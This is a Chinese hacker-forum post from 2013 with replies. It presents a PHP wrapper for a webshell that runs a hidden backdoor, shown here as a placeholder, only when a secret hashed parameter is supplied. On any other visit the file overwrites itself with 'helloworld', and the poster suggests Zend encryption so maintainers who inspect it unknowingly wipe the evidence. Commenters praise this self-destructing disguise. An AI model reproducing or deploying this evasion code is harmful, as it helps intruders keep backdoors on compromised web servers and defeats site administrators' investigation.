juuxdd (["' & ]) | 2013-12-14 23:46
if($_REQUEST["oo000"]==c47d187067c6cf953245f128b5fde62a){
一句话,或者木马代码!
}
else{
$url = $_SERVER['PHP_SELF'];
$filename = end(explode('/',$url));
$content = 'helloworld';
$fp = fopen ("$filename","w");
if (fwrite ($fp, $content)){
fclose ($fp);
die ("error");
} else {
fclose ($fp);
die ("good");
}
exit;
}
?>
用zend吧代码加密起来,
一般情况下,遇到陌生的php都会打开看看,一看是zend就会在浏览器访问下,这样的话,直接往当前文件写入一个正常的文字
不会被维护人员发觉!!被发现自动消失!
自己访问的时候?oo000=***这样,访问的方式不对,也会写入正常文字,
抛砖引玉,大牛勿喷
相关讨论:
1#
hqdvista (...) | 2013-12-14 23:49
和zend结合是有点意思
2#
juuxdd (["' & ]) | 2013-12-14 23:51
@hqdvista 恩, 这样看不到代码真实的执行过程,技术人员一般会在浏览器访问以下,然后就,没有然后了!
3#
pangshenjie (whoami) | 2013-12-15 00:02
@juuxdd 管理人员一访问,然后这个文件就没有了,如果你是管理员,你觉得这正常么
4#
juuxdd (["' & ]) | 2013-12-15 00:06
@pangshenjie 是文件内容变成别的了,不过一般很少有人会复制一份保存起来吧,至少我觉得是这样
5#
Ki11 (ฏ๎๎๎๎๎๎๎๎๎ฏ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้้้้็็็็็้้้้้็็็้็็็ ้้้้้็็็็็้้้้็็็็็ฏ๎็็็็็็oด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็ ้้้้้็็็็็้้้้็็็็็ฏด้้้้้็็็็็้้ ้้้้้็็็็็้้้้็็็็็ฏ๎๎๎๎๎๎๎๎๎ฏฏด้้้้้็็็็็้้o ้้้) | 2013-12-15 00:52
我想到一个更好的
6#
淡漠天空 (路人的世界) | 2013-12-15 08:54
@Ki11 ?
7#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-12-15 09:50
此“伪装”思路非常不错!
留言评论(旧系统):
文章来源于lcx.cc:这种自毁马有木有意义!!一种另类的脚本木马伪装思路……
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论